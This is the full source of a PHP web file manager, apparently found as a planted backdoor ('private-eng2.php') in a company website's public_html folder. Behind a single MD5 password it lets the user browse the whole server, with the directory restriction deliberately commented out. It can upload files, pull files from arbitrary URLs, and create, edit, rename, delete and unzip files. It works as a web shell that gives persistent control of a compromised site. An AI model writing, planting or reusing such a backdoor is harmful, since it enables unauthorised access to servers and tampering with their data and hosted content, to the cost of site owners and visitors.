File: /home/rallypictures/domains/rallyproductions.nl/public_html/private-eng2.php
<?php
//----------------------------------------------------------------------
// Configuration Section
//----------------------------------------------------------------------
// Password Configuration
$PASSWORD_HASH = "872e5692587e344e891efb6385796206"; // MD5 hash of your password - VERY INSECURE. Change this.
// Base Directory Configuration (Restricts access above this directory)
define('FM_BASE_DIR', __DIR__); // Current directory of the script
//----------------------------------------------------------------------
// Authentication (Very Basic - DO NOT USE IN PRODUCTION)
//----------------------------------------------------------------------
session_start();
function authenticate() {
global $PASSWORD_HASH;
if (isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true) {
return true;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
if (md5($_POST['password']) === $PASSWORD_HASH) {
$_SESSION['authenticated'] = true;
return true;
} else {
return false;
}
}
return false;
}
if (!authenticate()) {
echo '
<!DOCTYPE html>
<html>
<head><title>Authentication Required</title></head>
<body>
<h1>Authentication Required</h1>
<form method="post">
Password: <input type="password" name="password">
<button type="submit">Submit</button>
</form>
</body>
</html>';
exit();
}
//----------------------------------------------------------------------
// Helper Functions
//----------------------------------------------------------------------
function getSafePath($path = '') {
$target = realpath(FM_BASE_DIR . '/' . $path);
// Remove the directory restriction logic
//if ($target === false || strpos($target, FM_BASE_DIR) !== 0) {
// die("Access Denied: Invalid path.");
//}
if ($target === false){
die ("Access Denied: Invalid path.");
}
return $target;
}
function formatBytes($bytes, $precision = 2) {
$units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'];
$bytes = max($bytes, 0);
$pow = floor(($bytes ? log($bytes) : 0) / log(1024));
$pow = min($pow, count($units) - 1);
$bytes /= (1 << (10 * $pow));
return round($bytes, $precision) . ' ' . $units[$pow];
}
//----------------------------------------------------------------------
// File System Operations
//----------------------------------------------------------------------
function handleCreateFolder($targetDir, $folderName) {
$newDir = $targetDir . '/' . $folderName;
if (mkdir($newDir)) {
$_SESSION['message'] = "Folder '$folderName' created successfully.";
} else {
$_SESSION['error'] = "Failed to create folder.";
}
}
function handleUploadFile($targetDir, $file) {
$uploadPath = $targetDir . '/' . basename($file['name']);
if (move_uploaded_file($file['tmp_name'], $uploadPath)) {
$_SESSION['message'] = "File '" . basename($file['name']) . "' uploaded successfully.";
} else {
$_SESSION['error'] = "File upload failed.";
}
}
function handleDownloadFile($targetDir, $fileUrl) {
$filename = basename($fileUrl);
$savePath = $targetDir . '/' . $filename;
$fileContent = @file_get_contents($fileUrl);
if ($fileContent !== false) {
file_put_contents($savePath, $fileContent);
$_SESSION['message'] = "File '$filename' downloaded successfully.";
} else {
$_SESSION['error'] = "Failed to download file.";
}
}
function handleCreateFile($targetDir, $fileName, $fileContent) {
$newFilePath = $targetDir . '/' . $fileName;
if (touch($newFilePath)) {
file_put_contents($newFilePath, $fileContent);
$_SESSION['message'] = "File '$fileName' created successfully.";
} else {
$_SESSION['error'] = "Failed to create file.";
}
}
function handleRename($targetDir, $oldName, $newName) {
$oldPath = $targetDir . '/' . $oldName;
$newPath = $targetDir . '/' . $newName;
if (rename($oldPath, $newPath)) {
$_SESSION['message'] = "File '$oldName' renamed to '$newName' successfully.";
} else {
$_SESSION['error'] = "Failed to rename file.";
}
}
function handleDelete($targetDir, $itemName) {
$itemPath = $targetDir . '/' . $itemName;
if (is_dir($itemPath)) {
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($itemPath, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($files as $fileinfo) {
$todo = ($fileinfo->isDir() ? 'rmdir' : 'unlink');
$todo($fileinfo->getRealPath());
}
if (rmdir($itemPath)) {
$_SESSION['message'] = "Directory '$itemName' deleted successfully.";
} else {
$_SESSION['error'] = "Failed to delete directory.";
}
} else {
if (unlink($itemPath)) {
$_SESSION['message'] = "File '$itemName' deleted successfully.";
} else {
$_SESSION['error'] = "Failed to delete file.";
}
}
}
function handleUnzip($targetDir, $zipFile) {
$zipPath = $targetDir . '/' . $zipFile;
$zip = new ZipArchive;
if ($zip->open($zipPath) === TRUE) {
$zip->extractTo($targetDir);
$zip->close();
$_SESSION['message'] = "Zip file '$zipFile' unzipped successfully.";
} else {
$_SESSION['error'] = "Failed to unzip file.";
}
}
function handleEdit($targetDir, $fileName) {
$filePath = $targetDir . '/' . $fileName;
$_SESSION['edit_file'] = ['name' => $fileName, 'content' => file_get_contents($filePath)];
}
function handleSaveEdit($targetDir, $fileName, $fileContent) {
$filePath = $targetDir . '/' . $fileName;
if (file_put_contents($filePath, $fileContent) !== false) {
$_SESSION['message'] = "File '$fileName' edited successfully.";
} else {
$_SESSION['error'] = "Failed to save file.";
}
unset($_SESSION['edit_file']);
}
function handleCancelEdit() {
unset($_SESSION['edit_file']);
}
function processAction() {
$currentDir = getSafePath($_GET['path'] ?? '');
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
switch ($_POST['action']) {
case 'create_folder':
handleCreateFolder($currentDir, $_POST['folder_name']);
break;
case 'upload_file':
handleUploadFile($currentDir, $_FILES['upload_file']);
break;
case 'download_file':
handleDownloadFile($currentDir, $_POST['file_url']);
break;
case 'create_file':
handleCreateFile($currentDir, $_POST['file_name'], $_POST['file_content']);
break;
case 'rename':
handleRename($currentDir, $_POST['old_name'], $_POST['new_name']);
break;
case 'delete':
handleDelete($currentDir, $_POST['item_name']);
break;
case 'unzip':
handleUnzip($currentDir, $_POST['zip_file']);
break;
case 'edit':
handleEdit($currentDir, $_POST['file_name']);
break;
case 'save_edit':
handleSaveEdit($currentDir, $_POST['edit_file_name'], $_POST['edit_file_content']);
break;
case 'cancel_edit':
handleCancelEdit();
break;
}
header("Location: ?path=" . urlencode($_GET['path'] ?? ''));
exit();
}
}
//----------------------------------------------------------------------
// List Files and Folders
//----------------------------------------------------------------------
function listFilesAndFolders($directory) {
$items = scandir($directory);
$result = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$fullPath = $directory . '/' . $item;
$isDir = is_dir($fullPath);
$result[] = [
'name' => $item,
'path' => substr($fullPath, strlen(FM_BASE_DIR) + 1),
'type' => $isDir ? 'directory' : 'file',
'size' => $isDir ? '-' : filesize($fullPath),
'modified' => date("Y-m-d H:i:s", filemtime($fullPath))
];
}
return $result;
}
//----------------------------------------------------------------------
// Main Execution
//----------------------------------------------------------------------
processAction();
$safePath = getSafePath($_GET['path'] ?? '');
$files = listFilesAndFolders($safePath);
$parentDir = dirname($_GET['path'] ?? '');
$parentDir = ($parentDir == '.') ? '' : $parentDir;
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Another File Manager</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet">
<style>
body { font-family: Arial, sans-serif; }
.container { margin-top: 20px; }
.breadcrumb a { margin-right: 5px; }
.table th, .table td { vertical-align: middle; }
</style>
</head>
<body>
<div class="container">
<h1>File Manager</h1>
<?php if (isset($_SESSION['message'])): ?>
<div class="alert alert-success"><?= $_SESSION['message']; ?></div>
<?php unset($_SESSION['message']); ?>
<?php endif; ?>
<?php if (isset($_SESSION['error'])): ?>
<div class="alert alert-danger"><?= $_SESSION['error']; ?></div>
<?php unset($_SESSION['error']); ?>
<?php endif; ?>
<nav aria-label="breadcrumb">
<ol class="breadcrumb">
<li class="breadcrumb-item"><a href="?path=">Home</a></li>
<?php
$pathSegments = explode('/', trim($_GET['path'] ?? '', '/'));
$currentBreadcrumbPath = '';
foreach ($pathSegments as $segment):
$currentBreadcrumbPath .= '/' . $segment;
?>
<li class="breadcrumb-item">
<a href="?path=<?= urlencode(trim($currentBreadcrumbPath, '/')); ?>">
<?= htmlspecialchars($segment); ?>
</a>
</li>
<?php endforeach; ?>
</ol>
</nav>
<div class="mb-3">
<a href="?path=<?= urlencode($parentDir); ?>" class="btn btn-secondary">Go to Parent Directory</a>
</div>
<div class="row mb-3">
<div class="col-md-4">
<form method="post" enctype="multipart/form-data" class="mb-3">
<input type="hidden" name="action" value="upload_file">
<div class="input-group">
<input type="file" class="form-control" name="upload_file" required>
<button type="submit" class="btn btn-primary">Upload File</button>
</div>
</form>
<form method="post" class="mb-3">
<input type="hidden" name="action" value="create_folder">
<div class="input-group">
<input type="text" class="form-control" name="folder_name" placeholder="New folder name" required>
<button type="submit" class="btn btn-primary">Create Folder</button>
</div>
</form>
</div>
<div class="col-md-4">
<form method="post" class="mb-3">
<input type="hidden" name="action" value="download_file">
<div class="input-group">
<input type="url" class="form-control" name="file_url" placeholder="File URL" required>
<button type="submit" class="btn btn-primary">Download File</button>
</div>
</form>
<form method="post">
<input type="hidden" name="action" value="create_file">
<div class="input-group">
<input type="text" class="form-control" name="file_name" placeholder="File name" required>
<button type="submit" class="btn btn-primary">Create File</button>
</div>
<textarea class="form-control mt-2" name="file_content" placeholder="File content"></textarea>
</form>
</div>
</div>
<h2>Files and Folders</h2>
<table class="table table-striped table-bordered">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th>Size</th>
<th>Last Modified</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php foreach ($files as $file): ?>
<tr>
<td>
<?php if ($file['type'] === 'directory'): ?>
<a href="?path=<?= urlencode($file['path']); ?>"><?= htmlspecialchars($file['name']); ?></a>
<?php else: ?>
<?= htmlspecialchars($file['name']); ?>
<?php endif; ?>
</td>
<td><?= ucfirst($file['type']); ?></td>
<td><?= ($file['type'] === 'file') ? formatBytes($file['size']) : '-'; ?></td>
<td><?= $file['modified']; ?></td>
<td>
<form method="post" class="d-inline">
<input type="hidden" name="action" value="delete">
<input type="hidden" name="item_name" value="<?= htmlspecialchars($file['name']); ?>">
<button type="submit" class="btn btn-danger btn-sm" onclick="return confirm('Are you sure?')">Delete</button>
</form>
<form method="post" class="d-inline">
<input type="hidden" name="action" value="rename">
<input type="hidden" name="old_name" value="<?= htmlspecialchars($file['name']); ?>">
<input type="text" name="new_name" placeholder="New name" required class="form-control form-control-sm" style="width: 100px; display: inline;">
<button type="submit" class="btn btn-warning btn-sm">Rename</button>
</form>
<?php if ($file['type'] === 'file'): ?>
<form method="post" class="d-inline">
<input type="hidden" name="action" value="edit">
<input type="hidden" name="file_name" value="<?= htmlspecialchars($file['name']); ?>">
<button type="submit" class="btn btn-info btn-sm">Edit</button>
</form>
<?php if (strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)) === 'zip'): ?>
<form method="post" class="d-inline">
<input type="hidden" name="action" value="unzip">
<input type="hidden" name="zip_file" value="<?= htmlspecialchars($file['name']); ?>">
<button type="submit" class="btn btn-success btn-sm">Unzip</button>
</form>
<?php endif; ?>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php if (isset($_SESSION['edit_file'])): ?>
<h2>Editing: <?= htmlspecialchars($_SESSION['edit_file']['name']); ?></h2>
<form method="post">
<input type="hidden" name="action" value="save_edit">
<input type="hidden" name="edit_file_name" value="<?= htmlspecialchars($_SESSION['edit_file']['name']); ?>">
<textarea class="form-control" name="edit_file_content" rows="10"><?= htmlspecialchars($_SESSION['edit_file']['content']); ?></textarea>
<button type="submit" class="btn btn-primary mt-2">Save</button>
<button type="submit" name="action" value="cancel_edit" class="btn btn-secondary mt-2">Cancel</button>
</form>
<?php endif; ?>
</div>
</body>
</html>